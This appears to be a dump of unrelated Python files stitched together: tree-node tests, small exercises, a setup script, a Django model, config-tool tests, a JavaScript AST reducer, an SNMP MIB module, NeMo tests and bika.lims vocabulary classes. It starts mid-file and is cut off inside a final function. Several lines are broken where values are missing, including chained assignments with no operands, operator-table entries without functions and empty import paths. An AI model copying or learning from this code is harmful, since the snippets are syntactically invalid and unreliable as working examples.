= 'blue' node1a2 = Node() node1a2.value = 13 node1b = Node() node1b1 = Node() node1b1.find_me = True node1b1.color = 'blue' node1.parents.append(node1a, node1b) node1a.parents.append(node1a1, node1a2) node1b.parents.append(node1b1) assert node1.find_parent(value=13) == node1a2 assert node1.find_parent(find_me=True) == node1b1 assert node1.find_parent(color='blue') == [node1a1, node1b1] assert node1.find_parent(find_me=True, color='blue') == node1b1 def test_find_root(self): node1, node1a, node1b, node1a1 = Node(), Node(), Node(), Node() node1.children.append(node1a, node1b) node1a.children.append(node1a1) assert node1.find_root() == None assert node1a.find_root() == node1 assert node1b.find_root() == node1 assert node1a1.find_root() == node1 def test_cyclic_find(self): node1, node2 = Node(), Node() node1.children.append(node2) node2.children.append(node1) assert node1.find_root() == None assert node2.find_root() == None def test_find_parent_with_value_name(self): node1, node2, node3 = Node(), Node(), Node() node3.attribute_to_find = 'find me' node1.parents.append(node2) node2.parents.append(node3) assert node1.find_parent_with_attribute('attribute_to_find') == node3 def test_walk(self): node1, node2, node3, node4 = Node(), Node(), Node(), Node() node5 = Node() node1.children.append(node2) node1.children.append(node5) node2.children.append(node3) node2.children.append(node4) result = (node1, node3, node4, node2, node5 ) for i, node in enumerate(node1.walk()): assert node == result[i], '%s %s %s' % (i, node, result[i]) class TestTreeNode(): def test_set_parent(self): node1, node2 = TreeNode(), TreeNode() node1.parent = node2 assert node1.parent == node2 assert node2.children == [node1, ] def test_set_parent_twice(self): node1, node2, node3 = TreeNode(), TreeNode(), TreeNode() node1.parent = node2 node1.parent = node3 assert node2.children == [] assert node3.children == [node1, ] def test_find(self): node1, node2, node3 = TreeNode(), TreeNode(), TreeNode() node2.parent = node1 node3.parent = node1 = 'foo' = 'bar' assert node1.find(name='foo') == node2 assert node1.find(name='bar') == node3 assert node1.find(name='dummy') == None assert node2.find(name='foo') == None
GodwillOnyewuchi/Phase 1/Python Basic 2/day 9 task/task
#Python program to test whether the system is a big-endian platform or little-endian platform import sys if sys.byteorder == "little": print("Little-endian platform.") # its an intel, alpha else: print("Big-endian platform.") # its a motorola, sparc
def response(hey_bob): question = hey_bob.rstrip().endswith('?') yell = any(c.isupper() for c in hey_bob) \ and not any(c.islower() for c in hey_bob) nothing = not hey_bob.strip() if question and not yell: return "Sure." elif not question and yell: return "Whoa, chill out!" elif question and yell: return "Calm down, I know what I'm doing!" elif nothing: return "Fine. Be that way!" else: return "Whatever."
from distutils.core import setup setup( name = 'quicklock', packages = ['quicklock'], version = '0.1.7', description = 'A simple Python resource lock to ensure only one process at a time is operating with a particular resource.', author = '<NAME>', author_email = '<EMAIL>', url = '', download_url = '', keywords = ['lock', 'locking', 'singleton', 'process', 'resource', 'exclusive lock'], classifiers = [], platforms='any', install_requires = [ 'psutil>=2.2' ] )
<gh_stars>10-100 from django.shortcuts import resolve_url from django.utils.translation import gettext_lazy as _ from django.db import models from django.conf import settings from django.core.validators import RegexValidator from group_app.models import Group class PotentialSubscriber(models.Model): fio = models.CharField(_('fio'), max_length=256) telephone = models.CharField( max_length=16, verbose_name=_('Telephone'), blank=True, null=True, validators=(RegexValidator( getattr(settings, 'TELEPHONE_REGEXP', r'^(\+[7893]\d{10,11})?$') ),) ) group = models.ForeignKey( Group, on_delete=models.SET_NULL, blank=True, null=True, verbose_name=_('User group') ) town = models.CharField( _('Town'), help_text=_('Town, if group does not already exist'), max_length=127, blank=True, null=True ) street = models.CharField(_('Street'), max_length=127, blank=True, null=True) house = models.CharField( _('House'), max_length=12, null=True, blank=True ) description = models.TextField( _('Comment'), null=True, blank=True ) make_data = models.DateTimeField(_('Create date'), auto_now_add=True) deadline = models.DateField( _('Deadline connection'), help_text=_('Date when connection must be finished'), blank=True, null=True ) def get_absolute_url(self): return resolve_url('new_customers:user', class Meta: db_table = 'new_customers' verbose_name = _('Potential customer') verbose_name_plural = _('Potential customers') ordering = '-id',
# # Copyright (C) 2013 - 2021 <NAME> <<EMAIL>> # License: MIT # # pylint: disable=missing-docstring """test cases for anyconfig.cli module. """ import contextlib import io import pathlib import sys import tempfile import unittest import anyconfig.api import anyconfig.cli as TT from .. import base from . import collectors, datatypes def make_args(_self, tdata): """Make arguments to run cli.main. """ return ['anyconfig_cli'] + tdata.opts + [str(tdata.inp_path)] class BaseTestCase(unittest.TestCase): """Base Test case. """ collector = collectors.Collector() make_args = make_args def setUp(self): if self.collector: self.collector.init() def post_checks(self, tdata, *args, **kwargs): """Placeholder to do more post checks. """ pass def _run_main(self, tdata): """Wrapper for cli.main.""" args = self.make_args(tdata) if tdata.outname: # Running cli.main will output files. self.assertTrue( tdata.ref is not None, 'No reference data was given, {tdata!r}' ) with tempfile.TemporaryDirectory() as tdir: opath = pathlib.Path(tdir) / tdata.outname # Run anyconfig.cli.main with arguments. TT.main(args + ['-o', str(opath)]) if tdata.exp.exit_code_matches and tdata.exp.exit_code == 0: self.assertTrue(opath.exists(), str(opath)) try: odata = anyconfig.api.load(opath, **tdata.oo_opts) except anyconfig.api.UnknownFileTypeError: odata = anyconfig.api.load(opath, ac_parser='json') self.assertEqual(odata, tdata.ref, repr(tdata)) self.post_checks(tdata, opath) else: # Likewise but without -o <output_path> option. TT.main(args) self.post_checks(tdata) sys.exit(0) def run_main(self, tdata) -> None: """ Run anyconfig.cli.main and check if the exit code was expected one. """ expected: datatypes.Expected = tdata.exp with self.assertRaises(expected.exception, msg=repr(tdata)) as ctx: with contextlib.redirect_stdout(io.StringIO()) as stdout: with contextlib.redirect_stderr(io.StringIO()) as stderr: self._run_main(tdata) exc = ctx.exception self.assertTrue(isinstance(exc, expected.exception)) ecode = getattr(exc, 'error_code', getattr(exc, 'code', 1)) if expected.exit_code_matches: self.assertEqual(ecode, expected.exit_code, f'{tdata!r}') else: self.assertNotEqual(ecode, expected.exit_code, f'{tdata!r}') if expected.words_in_stdout: msg = stdout.getvalue() self.assertTrue(expected.words_in_stdout in msg, msg) if expected.words_in_stderr: err = stderr.getvalue() self.assertTrue(expected.words_in_stderr in err, err) def test_runs_for_datasets(self) -> None: if self.collector and self.collector.initialized: if self.collector.kind == base.TDataCollector.kind: return for tdata in self.collector.each_data(): self.run_main(tdata) class NoInputTestCase(BaseTestCase): """Test cases which does not require inputs. """ def make_args(self, tdata): # pylint: disable=no-self-use """Make arguments to run cli.main. """ return ['anyconfig_cli'] + tdata.opts # vim:sw=4:ts=4:et:
<gh_stars>1-10 #!/usr/bin/env python # -*- coding: utf-8 -*- ################################################################################ # # qooxdoo - the new era of web development # # # # Copyright: # 2006-2013 1&1 Internet AG, Germany, # # License: # MIT: # See the LICENSE file in the project's top-level directory for details. # # Authors: # * <NAME> (thron7) # ################################################################################ ## # Reduce the value of a syntax tree (expression). ## import os, sys, re, types, operator, functools as func from ecmascript.frontend import treeutil, treegenerator from ecmascript.frontend.treegenerator import symbol from ecmascript.frontend import Scanner from misc import util ## # ASTReducer - newer approach: A general AST reducer # # Computes new, pot. reduced tree. Does a post-order recursion (children first). # Carries .evaluated with nodes, to keep the Python value for a tree/contant # node, for easier operations, checking for hasattr() to determine # evaluated-ness. class ASTReducer(treeutil.NodeVisitor): def __init__(self, root_node): super(ASTReducer, self).__init__() self.root_node = root_node self.operations = self._init_operations() def _init_operations(self): operations = {} types_Number = (types.IntType, types.LongType, types.FloatType, types.BooleanType) def opr(operation, op1, op2): if all([isinstance(x, types_Number) for x in (op1, op2)]): return operation(op1, op2) else: return () operations['MUL'] = func.partial(opr, operator.mul) operations['DIV'] = func.partial(opr, operator.truediv) operations['MOD'] = func.partial(opr, operator.mod) # Have to distinguish between prefix and infix +/- def opr(operation, op1, op2=()): result = () if isinstance(op1, types_Number): # prefix +/- if op2==(): if operation=='+': result = operator.pos(op1) elif operation=='-': result = operator.neg(op1) elif isinstance(op2, types_Number): if operation=='+': result = operator.add(op1,op2) elif operation=='-': result = operator.sub(op1,op2) # string '+' elif operation=='+' and all([isinstance(x,types.StringTypes) for x in (op1,op2)]): result = operator.add(op1,op2) return result operations['ADD'] = func.partial(opr, '+') operations['SUB'] = func.partial(opr, '-') #operations['INC'] -- only on vars! #operations['DEC'] -- only on vars! operations['EQ'] = operator.eq operations['SHEQ'] = operator.eq operations['NE'] = operations['SHNE'] = operations['LT'] = operations['LE'] = operator.le operations['GT'] = operations['GE'] = operations['NOT'] = operator.not_ operations['AND'] = lambda x,y: x and y operations['OR'] = lambda x,y: x or y # bit operations only operate on 32-bit integers in JS operations['BITAND'] = operator.and_ operations['BITOR'] = operator.or_ operations['BITXOR'] = operator.xor operations['BITNOT'] = operator.inv # second shift operand must be in 0..31 in JS def opr(operation, op1, op2): op2 = (op2 & 0x1f) # coerce to 0..31 return operation(op1,op2) operations['LSH'] = func.partial(opr, operator.lshift) #def rsh(op1, op2): # # sign = (op1 >> 31) & 1 # if sign: # fills = ((sign << op2) - 1) << (32 - op2) # else: # fills = 0 # return ((op1 & 0xffffffff) >> op2) | fills #operations['RSH'] = func.partial(opr, rsh) operations['RSH'] = func.partial(opr, operator.rshift) def ursh(op1, op2): op1 = (op1 & 0xffffffff) # coerce to 32-bit int return operator.rshift(op1, op2) # Python .rshift does 0 fill operations['URSH'] = func.partial(opr, ursh) # ?: def opr(op1, op2, op3): return op2 if bool(op1) else op3 operations['HOOK'] = opr return operations # end:_init_operations def visit(self, node): # pre-order reduce children, to have their values when reducing current # node nchilds = [] for child in node.children: nchild = self.visit(child) nchilds.append(nchild) nnode = node nnode.children = [] for cld in nchilds: nnode.addChild(cld) # try reducing current node, might return a fresh symbol() if hasattr(self, "visit_"+node.type): nnode = getattr(self, "visit_"+node.type)(nnode) return nnode # - Due to pre-order recursion, type-specific methods don't need to recurse # anymore! def visit_constant(self, node): constvalue = node.get("value") consttype = node.get("constantType") value = () # the empty tuple indicates unevaluated if consttype == "number": constdetail = node.get("detail") if constdetail == "int": value = util.parseInt(constvalue) elif constdetail == "float": value = float(constvalue) elif consttype == "string": value = constvalue elif consttype == "boolean": value = {"true":True, "false":False}[constvalue] elif consttype == "null": value = None if value!=(): node.evaluated = value return node def visit_operation(self, node): operator = node.get("operator") arity = len(node.children) if arity == 1: nnode = self._visit_monadic(node, operator) elif arity == 2: nnode = self._visit_dyadic(node, operator) elif arity == 3: nnode = self._visit_triadic(node, operator) return nnode ## # IF def visit_loop(self, node): loop_type = node.get("loopType") nnode = node if loop_type == "IF": cond_node = node.children[0] if hasattr(cond_node, "evaluated"): value = bool(cond_node.evaluated) nnode, is_empty = treeutil.inlineIfStatement(node, value, inPlace=False) return nnode ## # (group) def visit_group(self, node): nnode = node # can only reduce "(3)" or "('foo')" or "(true)" etc. if len(node.children)==1: expr_node = node.children[0] if expr_node.type == 'constant': # must have been evaluated by pre-order nnode = expr_node return nnode def _visit_monadic(self, node, operator): op1 = node.children[0] nnode = node if hasattr(op1, "evaluated"): if operator in self.operations: evaluated = self.operations[operator](op1.evaluated) if evaluated!=(): nnode = symbol("constant")( node.get("line"), node.get("column")) set_node_type_from_value(nnode, evaluated) nnode.evaluated = evaluated return nnode def _visit_dyadic(self, node, operator): op1 = node.children[0] op2 = node.children[1] nnode = node if operator in self.operations: if operator in ['AND', 'OR'] and hasattr(op1, 'evaluated'): # short-circuit ops evaluated = self.operations[operator](op1.evaluated, op2) nnode = op1 if evaluated==op1.evaluated else op2 elif all([hasattr(x, 'evaluated') for x in (op1, op2)]): evaluated = self.operations[operator](op1.evaluated, op2.evaluated) if evaluated!=(): nnode = symbol("constant")( node.get("line"), node.get("column")) set_node_type_from_value(nnode, evaluated) nnode.evaluated = evaluated return nnode ## # HOOK def _visit_triadic(self, node, operator): op1 = node.children[0] op2 = node.children[1] op3 = node.children[2] nnode = node if operator in self.operations: # to evaluate HOOK, it is enough to evaluate the condition if operator == "HOOK" and hasattr(op1, 'evaluated'): nnode = self.operations[operator](op1.evaluated, op2, op3) return nnode ## # Take a Python value and init a constant node with it, setting the node's "constantType" # def set_node_type_from_value(valueNode, value): if isinstance(value, types.StringTypes): valueNode.set("constantType","string") quotes, escaped_value = escape_quotes(value) valueNode.set("detail", quotes) valueNode.set("value", escaped_value) elif isinstance(value, types.BooleanType): # this has to come early, as isinstance(True, types.IntType) is also true! valueNode.set("constantType","boolean") valueNode.set("value", str(value).lower()) elif isinstance(value, (types.IntType, types.LongType)): valueNode.set("constantType","number") valueNode.set("detail", "int") valueNode.set("value", str(value)) elif isinstance(value, types.FloatType): valueNode.set("constantType","number") valueNode.set("detail", "float") valueNode.set("value", str(value)) elif isinstance(value, types.NoneType): valueNode.set("constantType","null") valueNode.set("value", "null") else: raise ValueError("Illegal value for JS constant: %s" % str(value)) return valueNode ## # Determine the quoting to be used on that string in code ('singlequotes', # 'doublequotes'), and escape pot. embedded quotes correspondingly. # (The string might result from a concat operation that combined differently # quoted strings, like 'fo"o"bar' + "ba"\z\"boing"). # def escape_quotes(s): quotes = 'singlequotes' # aribtrary choice result = s # only if we have embedded quotes we have to check escaping if "'" in s: result = [] chunks = s.split("'") for chunk in chunks[:-1]: result.append(chunk) if not Scanner.is_last_escaped(chunk + "'"): result.append('\\') result.append("'") result.append(chunks[-1]) result = u''.join(result) return quotes, result # - --------------------------------------------------------------------------- def ast_reduce(node): reducer = ASTReducer(node) new_node = reducer.visit(node) return new_node
<reponame>simonsobs/socs<filename>agents/meinberg_m1000/mibs/<gh_stars>1-10 # # PySNMP MIB module MBG-SNMP-ROOT-MIB ( # ASN.1 source file://./MBG-SNMP-ROOT-MIB.mib # Produced by pysmi-0.3.4 at Fri May 1 22:39:55 2020 # On host grumpy platform Linux version 4.15.0-88-generic by user bjk49 # Using Python version 3.6.9 (default, Apr 18 2020, 01:56:04) # OctetString, Integer, ObjectIdentifier = mibBuilder.importSymbols("ASN1", "OctetString", "Integer", "ObjectIdentifier") NamedValues, = mibBuilder.importSymbols("ASN1-ENUMERATION", "NamedValues") ConstraintsUnion, ValueSizeConstraint, SingleValueConstraint, ValueRangeConstraint, ConstraintsIntersection = mibBuilder.importSymbols("ASN1-REFINEMENT", "ConstraintsUnion", "ValueSizeConstraint", "SingleValueConstraint", "ValueRangeConstraint", "ConstraintsIntersection") ModuleCompliance, NotificationGroup = mibBuilder.importSymbols("SNMPv2-CONF", "ModuleCompliance", "NotificationGroup") IpAddress, Gauge32, ModuleIdentity, Unsigned32, enterprises, Bits, Integer32, ObjectIdentity, iso, Counter64, NotificationType, TimeTicks, Counter32, MibScalar, MibTable, MibTableRow, MibTableColumn, MibIdentifier = mibBuilder.importSymbols("SNMPv2-SMI", "IpAddress", "Gauge32", "ModuleIdentity", "Unsigned32", "enterprises", "Bits", "Integer32", "ObjectIdentity", "iso", "Counter64", "NotificationType", "TimeTicks", "Counter32", "MibScalar", "MibTable", "MibTableRow", "MibTableColumn", "MibIdentifier") TextualConvention, DisplayString = mibBuilder.importSymbols("SNMPv2-TC", "TextualConvention", "DisplayString") mbgSnmpRoot = ModuleIdentity((1, 3, 6, 1, 4, 1, 5597)) mbgSnmpRoot.setRevisions(('2012-01-25 07:45', '2011-10-14 06:30',)) if mibBuilder.loadTexts: mbgSnmpRoot.setLastUpdated('201201250745Z') if mibBuilder.loadTexts: mbgSnmpRoot.setOrganization('Meinberg Radio Clocks GmbH & Co. KG') class MeinbergSwitch(TextualConvention, Integer32): status = 'current' subtypeSpec = Integer32.subtypeSpec + ConstraintsUnion(SingleValueConstraint(0, 1)) namedValues = NamedValues(("off", 0), ("on", 1)) mibBuilder.exportSymbols("MBG-SNMP-ROOT-MIB", mbgSnmpRoot=mbgSnmpRoot, MeinbergSwitch=MeinbergSwitch, PYSNMP_MODULE_ID=mbgSnmpRoot)
<reponame>borisdayma/NeMo<gh_stars>0 # ! /usr/bin/python # -*- coding: utf-8 -*- # ============================================================================= # Copyright 2020 NVIDIA. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # ============================================================================= # TODO: These test look bad/useless - redo import unittest import nemo from nemo.backends.pytorch.nm import TrainableNM from nemo.core.neural_types import ChannelType, NeuralType from tests.common_setup import NeMoUnitTest class TestNM1(TrainableNM): def __init__(self, var1=1, var2=2, var3=3): super(TestNM1, self).__init__() class TestNM2(TestNM1): def __init__(self, var2): super(TestNM2, self).__init__(var2=var2) class TestNeuralModulesPT(NeMoUnitTest): def setUp(self) -> None: super().setUp() # Mockup abstract methods. TestNM1.__abstractmethods__ = set() TestNM2.__abstractmethods__ = set() def test_default_init_params(self): simple_nm = TestNM1(var1=1) init_params = simple_nm.init_params self.assertEqual(init_params["var1"], 1) self.assertEqual(init_params["var2"], 2) self.assertEqual(init_params["var3"], 3) def test_simple_init_params(self): simple_nm = TestNM1(var1=10, var3=30) init_params = simple_nm.init_params self.assertEqual(init_params["var1"], 10) self.assertEqual(init_params["var2"], 2) self.assertEqual(init_params["var3"], 30) def test_nested_init_params(self): simple_nm = TestNM2(var2="hello") init_params = simple_nm.init_params self.assertEqual(init_params["var2"], "hello") def test_constructor_TaylorNet(self): tn = nemo.backends.pytorch.tutorials.TaylorNet(dim=4) self.assertEqual(tn.init_params["dim"], 4) def test_call_TaylorNet(self): x_tg = nemo.core.neural_modules.NmTensor( producer=None, producer_args=None, name=None, ntype=NeuralType(elements_type=ChannelType(), axes=('B', 'D')), ) tn = nemo.backends.pytorch.tutorials.TaylorNet(dim=4) # note that real port's name: x was used y_pred = tn(x=x_tg) self.assertEqual(y_pred.producer, tn) self.assertEqual(y_pred.producer_args.get("x"), x_tg) def test_simple_chain(self): data_source = nemo.backends.pytorch.tutorials.RealFunctionDataLayer(n=10000, batch_size=1) trainable_module = nemo.backends.pytorch.tutorials.TaylorNet(dim=4) loss = nemo.backends.pytorch.tutorials.MSELoss() x, y = data_source() y_pred = trainable_module(x=x) loss_tensor = loss(predictions=y_pred, target=y) # check producers' bookkeeping self.assertEqual(loss_tensor.producer, loss) self.assertEqual(loss_tensor.producer_args, {"predictions": y_pred, "target": y}) self.assertEqual(y_pred.producer, trainable_module) self.assertEqual(y_pred.producer_args, {"x": x}) self.assertEqual(y.producer, data_source) self.assertEqual(y.producer_args, {}) self.assertEqual(x.producer, data_source) self.assertEqual(x.producer_args, {})
<gh_stars>0 import tensorflow as tf class CharCNN(tf.keras.Model): def __init__(self, ): pass
<filename>bika/lims/vocabularies/ # -*- coding:utf-8 -*- from Acquisition import aq_get from bika.lims import bikaMessageFactory as _ from bika.lims.utils import t from bika.lims.interfaces import IDisplayListVocabulary, ICustomPubPref from bika.lims.utils import to_utf8 from Products.Archetypes.public import DisplayList from Products.CMFCore.utils import getToolByName from zope.interface import implements from pkg_resources import resource_filename from plone.resource.utils import iterDirectoriesOfType from zope.schema.interfaces import IVocabularyFactory from zope.schema.vocabulary import SimpleTerm from zope.schema.vocabulary import SimpleVocabulary from zope.component import getAdapters from import getSite import os import glob class CatalogVocabulary(object): """Make vocabulary from catalog query. """ implements(IDisplayListVocabulary) catalog = 'portal_catalog' contentFilter = {} key = 'UID' value = 'Title' def __init__(self, context, key=None, value=None, contentFilter=None): self.context = context self.key = key if key else self.key self.value = value if value else self.value self.contentFilter = \ contentFilter if contentFilter else self.contentFilter def __call__(self, **kwargs): site = getSite() request = aq_get(site, 'REQUEST', None) catalog = getToolByName(site, self.catalog) if 'allow_blank' in kwargs: allow_blank = True del (kwargs['allow_blank']) self.contentFilter.update(**kwargs) # If a secondary deactivation/cancellation workflow is anbled, # Be sure and select only active objects, unless other instructions # are explicitly specified: wf = getToolByName(site, 'portal_workflow') if 'portal_type' in self.contentFilter: portal_type = self.contentFilter['portal_type'] wf_ids = [ for x in wf.getWorkflowsFor(portal_type)] if 'bika_inactive_workflow' in wf_ids \ and 'bika_inactive_workflow' not in self.contentFilter: self.contentFilter['inactive_state'] = 'active' elif 'bika_cancellation_workflow' in wf_ids \ and 'bika_inactive_workflow' not in self.contentFilter: self.contentFilter['cancellation_state'] = 'active' brains = catalog(self.contentFilter) items = [('', '')] if allow_blank else [] for brain in brains: if self.key in brain and self.value in brain: key = getattr(brain, self.key) value = getattr(brain, self.value) else: obj = brain.getObjec() key = obj[self.key] key = callable(key) and key() or key value = obj[self.value] value = callable(value) and value() or value items.append((key, t(value))) return DisplayList(items) class BikaContentVocabulary(object): """Vocabulary factory for Bika Setup objects. We find them by listing folder contents directly. """ implements(IVocabularyFactory) def __init__(self, folders, portal_types): self.folders = isinstance(folders, (tuple, list)) and \ folders or [folders, ] self.portal_types = isinstance(portal_types, (tuple, list)) and \ portal_types or [portal_types, ] def __call__(self, context): site = getSite() request = aq_get(site, 'REQUEST', None) items = [] wf = site.portal_workflow for folder in self.folders: folder = site.restrictedTraverse(folder) for portal_type in self.portal_types: objects = list(folder.objectValues(portal_type)) objects = [o for o in objects if wf.getInfoFor(o, 'inactive_state') == 'active'] if not objects: continue objects.sort(lambda x, y: cmp(x.Title().lower(), y.Title().lower())) xitems = [(t(item.Title()), item.Title()) for item in objects] xitems = [SimpleTerm(i[1], i[1], i[0]) for i in xitems] items += xitems return SimpleVocabulary(items) class BikaCatalogTypesVocabulary(object): """Vocabulary factory for really user friendly portal types, filtered to return only types listed as indexed by bika_catalog """ implements(IVocabularyFactory) def __call__(self, context): translate = context.translate types = ( ('AnalysisRequest', translate(to_utf8(_('Analysis Request')))), ('Batch', translate(to_utf8(_('Batch')))), ('Sample', translate(to_utf8(_('Sample')))), ('ReferenceSample', translate(to_utf8(_('Reference Sample')))), ('Worksheet', translate(to_utf8(_('Worksheet')))) ) items = [SimpleTerm(i[0], i[0], i[1]) for i in types] return SimpleVocabulary(items) BikaCatalogTypesVocabularyFactory = BikaCatalogTypesVocabulary() class AnalysisCategoryVocabulary(BikaContentVocabulary): """" AnalysisCategories >>> portal = layer['portal'] >>> from import TEST_USER_NAME >>> from import TEST_USER_ID >>> from import setRoles >>> from import login >>> login(portal, TEST_USER_NAME) >>> setRoles(portal, TEST_USER_ID, ['Manager',]) >>> from zope.component import queryUtility >>> name = 'bika.lims.vocabularies.AnalysisCategories' >>> util = queryUtility(IVocabularyFactory, name) >>> folder = portal.bika_setup.bika_analysiscategories >>> objects = folder.objectValues() >>> len(objects) 3 >>> source = util(portal) >>> source <zope.schema.vocabulary.SimpleVocabulary object at ...> >>> 'Water Chemistry' in source.by_token True """ def __init__(self): BikaContentVocabulary.__init__(self, ['bika_setup/bika_analysiscategories', ], ['AnalysisCategory', ]) AnalysisCategoryVocabularyFactory = AnalysisCategoryVocabulary() class AnalysisProfileVocabulary(BikaContentVocabulary): def __init__(self): BikaContentVocabulary.__init__(self, ['bika_setup/bika_analysisprofiles', ], ['AnalysisProfile', ]) AnalysisProfileVocabularyFactory = AnalysisProfileVocabulary() class StorageLocationVocabulary(BikaContentVocabulary): def __init__(self): BikaContentVocabulary.__init__(self, ['bika_setup/bika_storagelocations', ], ['StorageLocation', ]) StorageLocationVocabularyFactory = StorageLocationVocabulary() class SamplePointVocabulary(BikaContentVocabulary): def __init__(self): BikaContentVocabulary.__init__(self, ['bika_setup/bika_samplepoints', ], ['SamplePoint', ]) SamplePointVocabularyFactory = SamplePointVocabulary() class SampleTypeVocabulary(BikaContentVocabulary): def __init__(self): BikaContentVocabulary.__init__(self, ['bika_setup/bika_sampletypes', ], ['SampleType', ]) SampleTypeVocabularyFactory = SampleTypeVocabulary() class AnalysisServiceVocabulary(BikaContentVocabulary): def __init__(self): BikaContentVocabulary.__init__(self, ['bika_setup/bika_analysisservices', ], ['AnalysisService', ]) AnalysisServiceVocabularyFactory = AnalysisServiceVocabulary() class ClientVocabulary(BikaContentVocabulary): def __init__(self): BikaContentVocabulary.__init__(self, ['clients', ], ['Client', ]) ClientVocabularyFactory = ClientVocabulary() class UserVocabulary(object): """ Present a vocabulary containing users in the specified list of roles >>> from zope.component import queryUtility >>> portal = layer['portal'] >>> name = 'bika.lims.vocabularies.Users' >>> util = queryUtility(IVocabularyFactory, name) >>> tool = portal.portal_registration >>> tool.addMember('user1', 'user1', ... properties = { ... 'username': 'user1', ... 'email': '<EMAIL>', ... 'fullname': 'user1'} ... ) <MemberData at /plone/portal_memberdata/user1 used for /plone/acl_users> >>> source = util(portal) >>> source <zope.schema.vocabulary.SimpleVocabulary object at ...> >>> 'test_user_1_' in source.by_value True >>> 'user1' in source.by_value True """ implements(IVocabularyFactory) def __init__(self, roles=[]): self.roles = roles if isinstance(roles, (tuple, list)) else [roles, ] def __call__(self, context): site = getSite() mtool = getToolByName(site, 'portal_membership') users = mtool.searchForMembers(roles=self.roles) items = [(item.getProperty('fullname'), item.getId()) for item in users] items.sort(lambda x, y: cmp(x[0].lower(), y[0].lower())) items = [SimpleTerm(i[1], i[1], i[0]) for i in items] return SimpleVocabulary(items) UserVocabularyFactory = UserVocabulary() ClientVocabularyFactory = ClientVocabulary() class ClientContactVocabulary(object): """ Present Client Contacts >>> from zope.component import queryUtility >>> portal = layer['portal'] >>> name = 'bika.lims.vocabularies.ClientContacts' >>> util = queryUtility(IVocabularyFactory, name) >>> from import TEST_USER_NAME >>> from import TEST_USER_ID >>> from import setRoles >>> from import login >>> login(portal, TEST_USER_NAME) >>> setRoles(portal, TEST_USER_ID, ['Manager',]) >>> portal.clients.invokeFactory('Client', id='client1') 'client1' >>> client1 = portal.clients.client1 >>> client1.processForm() >>> client1.invokeFactory('Contact', id='contact1') 'contact1' >>> contact1 = client1.contact1 >>> contact1.processForm() >>> contact1.edit(Firstname='Contact', Surname='One') >>> contact1.reindexObject() >>> source = util(portal) >>> source <zope.schema.vocabulary.SimpleVocabulary object at ...> >>> 'Contact One' in source.by_value True """ implements(IVocabularyFactory) def __call__(self, context): site = getSite() request = aq_get(site, 'REQUEST', None) items = [] for client in site.clients.objectValues('Client'): objects = list(client.objectValues('Contact')) objects.sort(lambda x, y: cmp(x.getFullname().lower(), y.getFullname().lower())) xitems = [(to_utf8(item.getFullname()), item.getFullname()) for item in objects] xitems = [SimpleTerm(i[1], i[1], i[0]) for i in xitems] items += xitems return SimpleVocabulary(items) ClientContactVocabularyFactory = ClientContactVocabulary() class AnalystVocabulary(UserVocabulary): def __init__(self): UserVocabulary.__init__(self, roles=['Analyst', ]) AnalystVocabularyFactory = AnalystVocabulary() class AnalysisRequestWorkflowStateVocabulary(object): """Vocabulary factory for workflow states. >>> from zope.component import queryUtility >>> portal = layer['portal'] >>> name = 'bika.lims.vocabularies.AnalysisRequestWorkflowStates' >>> util = queryUtility(IVocabularyFactory, name) >>> tool = getToolByName(portal, "portal_workflow") >>> states = util(portal) >>> states <zope.schema.vocabulary.SimpleVocabulary object at ...> >>> pub = states.by_token['published'] >>> pub.title, pub.token, pub.value (u'Published', 'published', 'published') """ implements(IVocabularyFactory) def __call__(self, context): portal = getSite() wftool = getToolByName(portal, 'portal_workflow', None) if wftool is None: return SimpleVocabulary([]) # XXX This is evil. A vocabulary shouldn't be request specific. # The sorting should go into a separate widget. # we get REQUEST from wftool because context may be an adapter request = aq_get(wftool, 'REQUEST', None) wf = wftool.getWorkflowById('bika_ar_workflow') items = wftool.listWFStatesByTitle(filter_similar=True) items_dict = dict([(i[1], t(i[0])) for i in items]) items_list = [(k, v) for k, v in items_dict.items()] items_list.sort(lambda x, y: cmp(x[1], y[1])) terms = [SimpleTerm(k, title=u'%s' % v) for k, v in items_list] return SimpleVocabulary(terms) AnalysisRequestWorkflowStateVocabularyFactory = \ AnalysisRequestWorkflowStateVocabulary() class ARPrioritiesVocabulary(BikaContentVocabulary): def __init__(self): BikaContentVocabulary.__init__(self, ['bika_setup/bika_arpriorities', ], ['ARPriority', ]) def getTemplates(bikalims_path, restype): """ Returns an array with the Templates available in the Bika LIMS path specified plus the templates from the resources directory specified and available on each additional product (restype). Each array item is a dictionary with the following structure: {'id': <template_id>, 'title': <template_title>} If the template lives outside the bika.lims add-on, both the template_id and template_title include a prefix that matches with the add-on identifier. template_title is the same name as the id, but with whitespaces and without extension. As an example, for a template from the my.product add-on located in <restype> resource dir, and with a filename "", the dictionary will look like: {'id': '', 'title': 'my.product: My cool report'} """ # Retrieve the templates from bika.lims add-on templates_dir = resource_filename("bika.lims", bikalims_path) tempath = os.path.join(templates_dir, '*.pt') templates = [os.path.split(x)[-1] for x in glob.glob(tempath)] # Retrieve the templates from other add-ons for templates_resource in iterDirectoriesOfType(restype): prefix = templates_resource.__name__ if prefix == 'bika.lims': continue dirlist = templates_resource.listDirectory() exts = ['{0}:{1}'.format(prefix, tpl) for tpl in dirlist if tpl.endswith('.pt')] templates.extend(exts) out = [] templates.sort() for template in templates: title = template[:-3] title = title.replace('_', ' ') title = title.replace(':', ': ') out.append({'id': template, 'title': title}) return out def getARReportTemplates(): """ Returns an array with the AR Templates available in Bika LIMS plus the templates from the 'reports' resources directory type from each additional product. Each array item is a dictionary with the following structure: {'id': <template_id>, 'title': <template_title>} If the template lives outside the bika.lims add-on, both the template_id and template_title include a prefix that matches with the add-on identifier. template_title is the same name as the id, but with whitespaces and without extension. As an example, for a template from the my.product add-on located in templates/reports dir, and with a filename "", the dictionary will look like: {'id': '', 'title': 'my.product: My cool report'} """ resdirname = 'reports' p = os.path.join("browser", "analysisrequest", "templates", resdirname) return getTemplates(p, resdirname) class ARReportTemplatesVocabulary(object): """Locate all ARReport templates to allow user to set the default """ implements(IVocabularyFactory) def __call__(self, context): out = [SimpleTerm(x['id'], x['id'], x['title']) for x in getARReportTemplates()] return SimpleVocabulary(out) def getStickerTemplates(): """ Returns an array with the sticker templates available. Retrieves the TAL templates saved in templates/stickers folder. Each array item is a dictionary with the following structure: {'id': <template_id>, 'title': 